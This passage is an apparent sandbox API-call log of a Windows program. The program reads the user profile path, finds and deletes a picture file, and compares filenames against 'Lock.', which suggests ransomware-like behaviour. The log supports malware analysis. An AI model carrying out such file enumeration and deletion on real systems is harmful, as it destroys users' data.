[0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0256.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.828] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0256.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0256.828] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0256.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0256.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.829] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0256.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0256.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/VLD3Nk1TIwkGNmyGPC.bmp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VLD3Nk1TIwkGNmyGPC.bmp", lpFilePart=0x8bedfc*="VLD3Nk1TIwkGNmyGPC.bmp") returned 0x3d [0256.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0256.831] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VLD3Nk1TIwkGNmyGPC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vld3nk1tiwkgnmygpc.bmp")) returned 0x20 [0256.831] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VLD3Nk1TIwkGNmyGPC.bmp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79631700, ftCreationTime.dwHighDateTime=0x1d4c782, ftLastAccessTime.dwLowDateTime=0x2fdb3700, ftLastAccessTime.dwHighDateTime=0x1d4d35a, ftLastWriteTime.dwLowDateTime=0x2fdb3700, ftLastWriteTime.dwHighDateTime=0x1d4d35a, nFileSizeHigh=0x0, nFileSizeLow=0xd25, dwReserved0=0x1710, dwReserved1=0x4, cFileName="VLD3Nk1TIwkGNmyGPC.bmp", cAlternateFileName="VLD3NK~1.BMP")) returned 0xaa5860 [0256.831] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VLD3Nk1TIwkGNmyGPC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vld3nk1tiwkgnmygpc.bmp")) returned 1 [0256.833] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79631700, ftCreationTime.dwHighDateTime=0x1d4c782, ftLastAccessTime.dwLowDateTime=0x2fdb3700, ftLastAccessTime.dwHighDateTime=0x1d4d35a, ftLastWriteTime.dwLowDateTime=0x2fdb3700, ftLastWriteTime.dwHighDateTime=0x1d4d35a, nFileSizeHigh=0x0, nFileSizeLow=0xd25, dwReserved0=0x1710, dwReserved1=0x4, cFileName="VLD3Nk1TIwkGNmyGPC.bmp", cAlternateFileName="VLD3NK~1.BMP")) returned 0 [0256.833] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0256.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.833] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0256.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0256.834] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0256.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0256.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.834] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0256.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0256.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0256.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0256.836] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/VLD3Nk1TIwkGNmyGPC.bmp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VLD3Nk1TIwkGNmyGPC.bmp", lpFilePart=0x8bf658*="VLD3Nk1TIwkGNmyGPC.bmp") returned 0x3d [0256.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0256.837] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VLD3Nk1TIwkGNmyGPC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vld3nk1tiwkgnmygpc.bmp")) returned 0xffffffff [0256.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.837] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0256.837] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.837] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0256.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0256.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="waKMSqrywnXqjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 